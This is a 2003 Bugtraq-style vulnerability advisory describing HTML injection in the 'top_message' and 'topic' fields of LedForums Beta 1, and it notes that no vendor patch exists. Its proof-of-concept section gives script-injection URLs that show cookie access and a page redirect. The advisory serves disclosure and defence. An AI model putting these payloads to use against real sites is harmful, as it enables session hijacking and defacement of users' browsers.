Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability
BID:8934
Info
Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability
| Bugtraq ID: | 8934 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 30 2003 12:00AM |
| Updated: | Oct 30 2003 12:00AM |
| Credit: | The disclosure of this issue has been credited to ProXy <[email protected]>. |
| Vulnerable: |
Ledscripts.com LedForums Beta 1 |
| Not Vulnerable: | |
Discussion
Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability
It has been reported that LedForums is prone to a HTML injection vulnerability that may allow an attacker to execute HTML code in a user's browser. The issue is reported to be present in the 'top_message' and 'topic' fields. This problem is due to insufficient sanitization of user-supplied input.
Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials. Other attacks are also possible.
LedForums Beta 1 has been reported to be vulnerable to this issue.
It has been reported that LedForums is prone to a HTML injection vulnerability that may allow an attacker to execute HTML code in a user's browser. The issue is reported to be present in the 'top_message' and 'topic' fields. This problem is due to insufficient sanitization of user-supplied input.
Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials. Other attacks are also possible.
LedForums Beta 1 has been reported to be vulnerable to this issue.
Exploit / POC
Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability
The following proof of concept has been provided:
http://www.example.com/~path/index.php?top_message=<script>alert(document.cookie)</script>
http://www.example.com/~path/index.php?top_message=<h1>OWNED?%20*g*</h1>
<script>window.location='http://www.example.org'</script>
The following proof of concept has been provided:
http://www.example.com/~path/index.php?top_message=<script>alert(document.cookie)</script>
http://www.example.com/~path/index.php?top_message=<h1>OWNED?%20*g*</h1>
<script>window.location='http://www.example.org'</script>
Solution / Fix
Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability
References:
References:
- LedForums Product Homepage (Ledscripts)
- Multiple Vulnerabilities in Led-Forums (ProXy -
)